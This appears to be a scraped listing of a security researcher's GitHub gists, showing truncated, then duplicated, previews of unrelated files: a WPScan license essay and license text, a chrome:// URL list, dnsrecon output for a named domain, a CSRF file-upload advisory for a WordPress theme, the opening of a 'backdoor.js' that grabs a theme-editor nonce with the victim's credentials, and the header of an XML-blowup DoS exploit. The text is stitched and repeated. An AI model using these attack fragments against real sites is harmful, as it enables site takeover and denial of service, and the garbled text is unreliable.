Ryan Dewhurst ethicalhack3r

## chrome-uri.txt
chrome://-alkuisissa
chrome://-nettadresser
chrome://-webbadresser
chrome://ChromeTestChromeWebUIControllerFactory
chrome://DummyURL
chrome://URLs
chrome://about
chrome://accessibility
chrome://anything
chrome://app-list

## backdoor.js
var wpnonce = '';

function getCSRFNonce(callback)
{
  var re = /<input type="hidden" id="_wpnonce" name="_wpnonce" value="(\w*)" \/>/

  var xhr = new XMLHttpRequest();
  xhr.open("GET", "http://mywordpress.com/wordpress/wordpress-475/wp-admin/theme-editor.php?file=index.php&theme=twentyseventeen", true);
  xhr.withCredentials = true;
  xhr.overrideMimeType('text/xml');

## post.txt
When you first release software online you don't put too much thought into the software license (I didn't at least). You have no idea if the project will take off. If your intention is for your peers to use it freely your first thought may be Open Source. The most popular Open Source license is the GNU GPL, so why not use that!?

I released WPScan on the 16th of June 2011 along with the GNU GPL license. After a while I built up a team, The WPScan Team, which were people who had the same goals as me, to make an awesome black box WordPress scanning tool. The WPScan Team (3 other awesome people) and I have been working on WPScan in our spare time as volunteers for almost 4 years. Countless hours, days, weeks and months of man hours have been put into WPScan and recently the WPScan Vulnerability Database by us.

And we don't mind this, we do it because we want our peers to be able to use the software freely. We do it because we want to use the software ourselves. Of course there is no selfless deed, we do it for

## license.txt
WPScan Public Source License

The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2015 WPScan Team.

Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below.

Definitions

“License” means this document.
“Contributor” means each individual or legal entity that creates, contributes to the creation of, or owns WPScan.

## gist:66de53fb6a110f2834b9
http://theantisocialengineer.com/wp-admin/admin-ajax.php?action=wordfence_logHuman&hid=AAF49566F17ED862F20934A0501A97C9&r=0.5144356689415872

## advisory
Theme Name: Satoshi v2.0
Theme URI: http://www.vooshthemes.com
Description: A Free Portfolio Theme Developed By Voosh Themes. Please look at the <a href="../wp-content/themes/satoshi/instructions/instructions.html">instructions</a> that are included with the file you downloaded <a href="../wp-content/themes/satoshi/instructions/instructions.html">(satoshi/instructions/instructions.html)</a> for details about how to configure this theme.
Author: Voosh Themes
Author URI: http://www.vooshthemes.com

wp-content/themes/satoshi/upload-file.php vulnerable to CSRF file upload via ajaxupload.3.5.js

Localhost Demo:

## pluggable.php
<?php

if ( !function_exists('wp_generate_auth_cookie') ) :
/**
 * Generate authentication cookie contents.
 *
 * @since 2.5.0
 *
 * @param int $user_id User ID
 * @param int $expiration Cookie expiration in seconds

## gist:cb06f575c6ba28644e9a
$ ./dnsrecon.py -d jamiehankins.co.uk
[*] Performing General Enumeration of Domain: jamiehankins.co.uk
[-] DNSSEC is not configured for jamiehankins.co.uk
[*] 	 SOA hank.ns.cloudflare.com 173.245.59.116
[*] 	 SOA hank.ns.cloudflare.com 2400:cb00:2049:1::adf5:3b74
[*] 	 NS hank.ns.cloudflare.com 173.245.59.116
[*] 	 NS hank.ns.cloudflare.com 2400:cb00:2049:1::adf5:3b74
[*] 	 NS lucy.ns.cloudflare.com 173.245.58.133
[*] 	 NS lucy.ns.cloudflare.com 2400:cb00:2049:1::adf5:3a85
[*] 	 MX aspmx2.googlemail.com 74.125.143.27

## test.html
<!DOCTYPE html>
<html>
<body>

<input type="text" name="version1" value="1.0">

<select>
  <option value="&lt;">&lt;</option>
  <option value="&gt;">&gt;</option>
  <option value="=">=</option>

## wp_dos.py
#################################################################################
# CVE-XXXXX Wordpress and Drupal XML Blowup Attack DoS#
# Author: Nir Goldshlager - Salesforce.com Product Security Team#
# This is a Proof of Concept Exploit, Please use responsibly.#
#################################################################################
#!/usr/bin/env python
from __future__ import print_function
import threading
import time
import urllib
	chrome://-alkuisissa
	chrome://-nettadresser
	chrome://-webbadresser
	chrome://ChromeTestChromeWebUIControllerFactory
	chrome://DummyURL
	chrome://URLs
	chrome://about
	chrome://accessibility
	chrome://anything
	chrome://app-list
	var wpnonce = '';

	function getCSRFNonce(callback)
	{
	var re = /<input type="hidden" id="_wpnonce" name="_wpnonce" value="(\w*)" \/>/

	var xhr = new XMLHttpRequest();
	xhr.open("GET", "http://mywordpress.com/wordpress/wordpress-475/wp-admin/theme-editor.php?file=index.php&theme=twentyseventeen", true);
	xhr.withCredentials = true;
	xhr.overrideMimeType('text/xml');
	When you first release software online you don't put too much thought into the software license (I didn't at least). You have no idea if the project will take off. If your intention is for your peers to use it freely your first thought may be Open Source. The most popular Open Source license is the GNU GPL, so why not use that!?

	I released WPScan on the 16th of June 2011 along with the GNU GPL license. After a while I built up a team, The WPScan Team, which were people who had the same goals as me, to make an awesome black box WordPress scanning tool. The WPScan Team (3 other awesome people) and I have been working on WPScan in our spare time as volunteers for almost 4 years. Countless hours, days, weeks and months of man hours have been put into WPScan and recently the WPScan Vulnerability Database by us.

	And we don't mind this, we do it because we want our peers to be able to use the software freely. We do it because we want to use the software ourselves. Of course there is no selfless deed, we do it for
	WPScan Public Source License

	The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2015 WPScan Team.

	Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below.

	Definitions

	“License” means this document.
	“Contributor” means each individual or legal entity that creates, contributes to the creation of, or owns WPScan.
	Theme Name: Satoshi v2.0
	Theme URI: http://www.vooshthemes.com
	Description: A Free Portfolio Theme Developed By Voosh Themes. Please look at the <a href="../wp-content/themes/satoshi/instructions/instructions.html">instructions</a> that are included with the file you downloaded <a href="../wp-content/themes/satoshi/instructions/instructions.html">(satoshi/instructions/instructions.html)</a> for details about how to configure this theme.
	Author: Voosh Themes
	Author URI: http://www.vooshthemes.com

	wp-content/themes/satoshi/upload-file.php vulnerable to CSRF file upload via ajaxupload.3.5.js

	Localhost Demo:
	<?php

	if ( !function_exists('wp_generate_auth_cookie') ) :
	/**
	* Generate authentication cookie contents.
	*
	* @since 2.5.0
	*
	* @param int $user_id User ID
	* @param int $expiration Cookie expiration in seconds
	$ ./dnsrecon.py -d jamiehankins.co.uk
	[*] Performing General Enumeration of Domain: jamiehankins.co.uk
	[-] DNSSEC is not configured for jamiehankins.co.uk
	[*] SOA hank.ns.cloudflare.com 173.245.59.116
	[*] SOA hank.ns.cloudflare.com 2400:cb00:2049:1::adf5:3b74
	[*] NS hank.ns.cloudflare.com 173.245.59.116
	[*] NS hank.ns.cloudflare.com 2400:cb00:2049:1::adf5:3b74
	[*] NS lucy.ns.cloudflare.com 173.245.58.133
	[*] NS lucy.ns.cloudflare.com 2400:cb00:2049:1::adf5:3a85
	[*] MX aspmx2.googlemail.com 74.125.143.27
	<!DOCTYPE html>
	<html>
	<body>

	<input type="text" name="version1" value="1.0">

	<select>
	<option value="<"><</option>
	<option value=">">></option>
	<option value="=">=</option>
	#################################################################################
	# CVE-XXXXX Wordpress and Drupal XML Blowup Attack DoS#
	# Author: Nir Goldshlager - Salesforce.com Product Security Team#
	# This is a Proof of Concept Exploit, Please use responsibly.#
	#################################################################################
	#!/usr/bin/env python
	from __future__ import print_function
	import threading
	import time
	import urllib